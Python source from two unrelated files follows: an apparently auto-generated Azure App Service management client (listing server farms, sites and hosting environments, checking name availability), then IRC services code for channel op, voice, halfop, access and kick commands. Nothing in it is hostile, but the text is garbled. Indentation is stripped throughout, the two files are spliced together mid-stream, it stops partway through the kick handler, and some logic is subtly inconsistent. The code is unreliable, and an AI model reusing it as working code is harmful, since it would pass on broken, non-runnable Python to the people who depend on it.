header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_server_farms(
self, detailed=None, custom_headers=None, raw=False, **operation_config):
"""
Gets all App Service Plans for a subscription
:param detailed: False to return a subset of App Service Plan
properties, true to return all of the properties.
Retrieval of all properties may increase the API latency.
:type detailed: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ServerFarmCollection
<azure.mgmt.web.models.ServerFarmCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/serverfarms'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if detailed is not None:
query_parameters['detailed'] = self._serialize.query("detailed", detailed, 'bool')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServerFarmCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
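# Hypothetical usage sketch (client wiring assumed, not taken from this file):
# pass detailed=True to request the full property set, which the docstring
# warns may increase API latency; omitting it returns the lighter subset.
#
#   plans = client.global_model.get_all_server_farms(detailed=True)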
def get_all_sites(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all Web Apps for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`SiteCollection <azure.mgmt.web.models.SiteCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/sites'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SiteCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_hosting_environments(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all hostingEnvironments (App Service Environment) for a
subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`HostingEnvironmentCollection
<azure.mgmt.web.models.HostingEnvironmentCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironmentCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_managed_hosting_environments(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all managed hosting environments for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ManagedHostingEnvironmentCollection
<azure.mgmt.web.models.ManagedHostingEnvironmentCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/managedHostingEnvironments'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ManagedHostingEnvironmentCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_classic_mobile_services(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all mobile services for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ClassicMobileServiceCollection
<azure.mgmt.web.models.ClassicMobileServiceCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/classicMobileServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ClassicMobileServiceCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_premier_add_on_offers(
self, custom_headers=None, raw=False, **operation_config):
"""
List premier add on offers
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/premieraddonoffers'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def is_hosting_environment_name_available(
self, name, custom_headers=None, raw=False, **operation_config):
"""
Whether hosting environment name is available
:param name: Hosting environment name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/ishostingenvironmentnameavailable'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def is_hosting_environment_with_legacy_name_available(
self, name, custom_headers=None, raw=False, **operation_config):
"""
Whether hosting environment name is available
:param name: Hosting environment name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/ishostingenvironmentnameavailable/{name}'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def check_name_availability(
self, request, custom_headers=None, raw=False, **operation_config):
"""
Check if resource name is available
:param request: Name availability request
:type request: :class:`ResourceNameAvailabilityRequest
<azure.mgmt.web.models.ResourceNameAvailabilityRequest>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ResourceNameAvailability
<azure.mgmt.web.models.ResourceNameAvailability>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/checknameavailability'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(request, 'ResourceNameAvailabilityRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ResourceNameAvailability', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
# chanop.py (js3263854/python_unrealircd_services, MIT/Unlicense)
''' ChanOP commands '''
from db import *
from shared import *
import re
def process_chanop_halfopdehalfop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlhalfop = 0
lvldehalfop = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) < 3:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "%"
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == 0 and "dehalfop" in params[1]:
strrep = mod
strrep = strrep.replace("%","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not half-opped on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
print("Adding % to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "%"
elif chkmod == 0 and "dehalfop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldehalfop = check_channel_access(conn, channel, user)
if lvldehalfop > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be removed from half-op.\n".format(user))
continue
else:
print("Removing % from user: {}".format(user))
mod = mod.replace("%","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not half-opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 75 channel access on {} to use the halfop command.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
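# The two branches above that flush `tbuffer` every six users, plus the final
# flush of any remainder, can be expressed as a single chunking helper. This
# standalone sketch is illustrative only and is not called by the functions in
# this file; the ":00000000A" services SID prefix is copied from the code above.
def _batch_mode_lines(channel, modes, modechar, users, group=6):
    ''' Split `users` into MODE lines of at most `group` targets each. '''
    lines = []
    for i in range(0, len(users), group):
        chunk = users[i:i + group]
        # One mode character per target, e.g. "+hhh nick1 nick2 nick3"
        lines.append(":00000000A MODE {} {}{} {}\n".format(
            channel, modes, modechar * len(chunk), ' '.join(chunk)))
    return lines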
def process_chanop_voicedevoice(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlvoicer = 0
lvldevoicer = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) < 3:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
print(ret)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("+")
print(f"chkmod: {chkmod}")
if chkmod == -1 and "devoice" not in params[1]:
self.chans[chan].onlist[ret] = mod + "+"
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "devoice" in params[1]:
strrep = mod
strrep = strrep.replace("+","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "devoice" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not voiced on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("+")
if chkmod == -1 and "devoice" not in params[1]:
print("Adding + to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "+"
elif chkmod != -1 and "devoice" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldeopped = check_channel_access(conn, channel, user)
if lvldeopped > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be devoiced.\n".format(user))
continue
else:
print("Removing + from user: {}".format(user))
mod = mod.replace("+","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "devoice" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not voiced on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(''.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 75 channel access on {} to use the voice command.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_opdeop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlopper = 0
lvldeopped = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if len(params) < 3:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "@"
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "deop" in params[1]:
strrep = mod
strrep = strrep.replace("@","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "deop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not opped on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
print("Adding @ to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "@"
elif chkmod != -1 and "deop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldeopped = check_channel_access(conn, channel, user)
if lvldeopped > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be deopped.\n".format(user))
continue
else:
print("Removing @ from user: {}".format(user))
mod = mod.replace("@","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "deop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
else:
print(f"{user} UID is None")
if len(tbuffer) > 0:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(''.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You don't have operator access on {}.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_access(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 1:
if len(params) == 2:
rows = list_channel_access(conn, channel, nick)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format(nick, channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
if str(row[0]) == nick:
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
elif params[2] == "*\r\n":
rows = list_channel_access(conn, channel, None)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format("*", channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
print(row)
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
elif len(params) == 3:
rows = list_channel_access(conn, channel, None)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format(params[2].strip(), channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
print(row)
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
if nickname == params[2].strip():
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
else:
send_notice_as_chanop(self, nick, "ERROR: You don't have access to {}.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: Channel {} has not been registered.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: The username {} has not been registered.".format(nick))
def process_chanop_kick(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
kicked = ""
reason = ""
kicked_uid = ""
if len(params) >= 3:
kicked = params[2].strip()
if len(params) >= 4:
reason = ' '.join(params[3:])
else:
reason = "You have been kicked."
conn = create_connection("users.db")
with conn:
idstatus = check_nickname_identified(conn, kicked)
results = check_nickname_exists(conn, nick)
kicked_uid = nick_to_uid(self, kicked)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 50:
if len(params) >= 3:
protstatus = check_prot_status(conn, chan, kicked)
if kicked_uid != None:
kicked_user_l = check_channel_access(conn, channel, kicked)
kicker_l = check_channel_access(conn, channel, nick)
try:
chk = self.chans[chan].onlist[kicked_uid]
except:
pass
if kicked_user_l <= kicker_l and protstatus != 1:
reason = "({}) {}\n".format(nick, reason)
data = ":00000000A KICK {} {} :{}\n".format(channel, kicked, reason)
print(data)
self.sockssl.send(data.encode('ascii'))
send_notice_as_chanop(self, nick, "Kicked user {}".format(kicked))
del self.chans[chan].onlist[kicked_uid]
else:
send_notice_as_chanop(self, nick, "ERROR: Cannot kick user {}\n".format(kicked))
else:
send_notice_as_chanop(self, nick, "ERROR: There is no user called {} in {}.\n".format(kicked, channel))
print("users on channel {}".format(channel))
for usr in self.chans[chan].onlist:
print("user is: {} with modes: {}".format(usr, self.chans[chan].onlist[usr]))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for kick: <username> [reason]")
else:
